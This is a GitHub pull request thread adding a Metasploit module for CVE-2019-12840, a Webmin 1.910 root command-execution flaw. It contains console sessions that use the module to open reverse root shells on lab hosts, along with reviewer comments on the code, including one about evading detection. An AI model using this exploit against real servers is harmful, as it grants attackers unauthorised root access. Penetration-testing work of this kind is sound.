CVE-2019-12840 - Add Webmin 1.910 RCE Module
rapid7/metasploit-framework pull request #11983
Opened 2019-06-16 15:34 UTC by siberguvenlik

Adding Webmin RCE module affecting Webmin <= 1.910.
Module exploits an arbitrary command execution vulnerability. 
Any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.

## Verification

msf5 > 
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.9
LHOST => 192.168.1.12
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce
USERNAME => rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password
PASSWORD => password
msf5 exploit(linux/http/webmin_packageup_rce) > check

[] NICE! rce has the right to >>Package Update<<

[+] 192.168.1.9:10000 - The target is vulnerable.
msf5 exploit(linux/http/webmin_packageup_rce) > run

[] Started reverse TCP handler on 192.168.1.12:4444 
[+] Session cookie: b188bde1b3979ada77f1f8e4f84f7d4c
[] Attempting to execute the payload...
[] Command shell session 1 opened (192.168.1.12:4444 -> 192.168.1.9:57270) at 2019-06-16 11:07:04 -0400

id
uid=0(root) gid=0(root) groups=0(root)

### Details and References

https://nvd.nist.gov/vuln/detail/CVE-2019-12840
https://www.exploit-db.com/exploits/46984
https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html

2019-06-16 16:35 UTC, h00die requested changes

2019-06-16 16:35 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +      'Name'           => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution',
Check the name field guide here: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit
I would suggestion: `Webmin Package Updates Remote Command Execution`

2019-06-16 16:35 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +
extra space can be removed

2019-06-16 16:35 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +          ['CVE', '2019-'],
2019-12840

2019-06-16 16:35 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +          'PAYLOAD' => 'cmd/unix/reverse_python' # its depends
Webmin is written in perl, which guarantees perl is on the system.  I would opt for a `payload/cmd/unix/revese_perl` as the default, pending there wasn't some issue with it

2019-06-16 16:35 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +    print_error("#{datastore['USERNAME']} has not the right to >>Package Update<<")
`s/has not/doesn't have/`

2019-06-16 16:35 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +  def check
I think there may be a flaw with this check function.  You check the creds, you check the privs, but never check the app version.  This is likely to give false positives as soon as the next version number is released, I would suggest adding a version check.

2019-06-16 16:35 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +      'cookie' => 'testing=1',
Is this a true default (given by the system) or just arbitrary for this module?  If its arbitrary, I would randomize it to prevent easy detection

2019-06-16 16:35 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +      'cookie' => "redirect=1; testing=1; sid=#{cookie}"
see other cookie comment above

2019-06-16 16:35 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +    res = send_request_raw(
I don't believe this needs to be raw, i would suggest cgi

2019-06-16 16:35 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +# Exploiting phase
you can remove these function comments (i believe there are 3 of them), they aren't needed

2019-06-16 16:38 UTC, h00die commented
Please also add module documentation. See https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation
or 
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md

2019-06-16 22:03 UTC, siberguvenlik commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +  def check
I've decided to use "bash" to avoid syntax errors from many payload types. 
Hence the default payload has been removed. Any unix payload can be used.

2019-06-16 22:04 UTC, siberguvenlik commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +      'cookie' => 'testing=1',
I'm sorry I missed it. I removed these values. "sid" will suffice. Thanks

2019-06-16 22:05 UTC, siberguvenlik commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +    res = send_request_raw(
yes It's my fault again :))

2019-06-16 22:31 UTC, siberguvenlik commented
> Please also add module documentation. See https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation
> or
> https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md

its okey now. Thank you for the informations

2019-06-16 22:41 UTC, siberguvenlik commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +          'PAYLOAD' => 'cmd/unix/reverse_python' # its depends
I've decided to use "bash" to avoid syntax errors from many payload types.
Hence the default payload has been removed. Any unix payload can be used.

2019-06-16 23:55 UTC, h00die commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +      'uri'     => normalize_uri(target_uri.path, "sysinfo.cgi?xnavigation=1"),
As per Travis, this should be converted into a `vars_get`

2019-06-17 07:49 UTC, siberguvenlik commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +      'uri'     => normalize_uri(target_uri.path, "sysinfo.cgi?xnavigation=1"),
it's done too

2019-06-17 15:52 UTC, wvu-r7 commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +  def exec(cookie)
Please don't redefine `exec`. Choose a different name.

2019-06-17 15:52 UTC, wvu-r7 commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +
Whitespace.

2019-06-17 15:52 UTC, wvu-r7 commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +
Whitespace.

2019-06-17 15:52 UTC, wvu-r7 commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +
Whitespace.

2019-06-17 15:53 UTC, wvu-r7 commented on modules/exploits/linux/http/webmin_packageup_rce.rb
> +
Whitespace.

2019-06-17 15:53 UTC, wvu requested changes
Comments for @space-r7 to possibly address.

2019-06-17 20:40 UTC, space-r7 commented
Hi @siberguvenlik, I just submitted a PR to your branch that addresses the changes suggested here in this PR. Please let me know if you have any issues with that. Thank you!

2019-06-18 07:10 UTC, siberguvenlik commented
thanks @space-r7  and @wvu-r7. I performed the required action.

2019-06-18 15:09 UTC, wvu approved these changes

2019-06-19 13:31 UTC, space-r7 commented
Tested:

```
msf5 > use exploit/linux/http/webmin_packageup_rce 
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 192.168.37.132
rhosts => 192.168.37.132
msf5 exploit(linux/http/webmin_packageup_rce) > set username space
username => space
msf5 exploit(linux/http/webmin_packageup_rce) > set password password
password => password
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > check

[*] NICE! space has the right to >>Package Update<<
[+] 192.168.37.132:10000 - The target is vulnerable.
msf5 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] Session cookie: f20e69324fc0187678798822c4c21365
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.132:57616) at 2019-06-19 08:29:59 -0500

whoami

root
```

2019-06-19 13:36 UTC, merged

2019-06-19 13:39 UTC, space-r7 commented
## Release Notes

This exploit module gets code execution with root privileges in Webmin versions <= 1.910 via the unsanitized `data` parameter to `update.cgi`.